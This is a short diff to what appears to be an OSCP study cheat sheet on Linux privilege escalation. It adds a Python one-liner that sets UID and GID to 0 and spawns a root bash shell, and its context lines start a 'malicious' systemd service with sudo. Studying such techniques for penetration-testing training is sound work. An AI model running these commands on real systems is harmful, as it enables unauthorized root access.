ThatTotallyRealMyth/OSCP-LinPrivEsc/Linux-PrivEsc.md

 # Enable and start the malicious service if you have sudo rights
 sudo systemctl enable privesc.service sudo systemctl start privesc.service

+#Post running rootbash to upgrade our shell fully
+python -c 'import os; os.setuid(0); os.setgid(0); os.system("/bin/bash")' #You can also use python3 with the same command if its present instead
 ```

 ### One-liners to Identify Service Vulnerabilities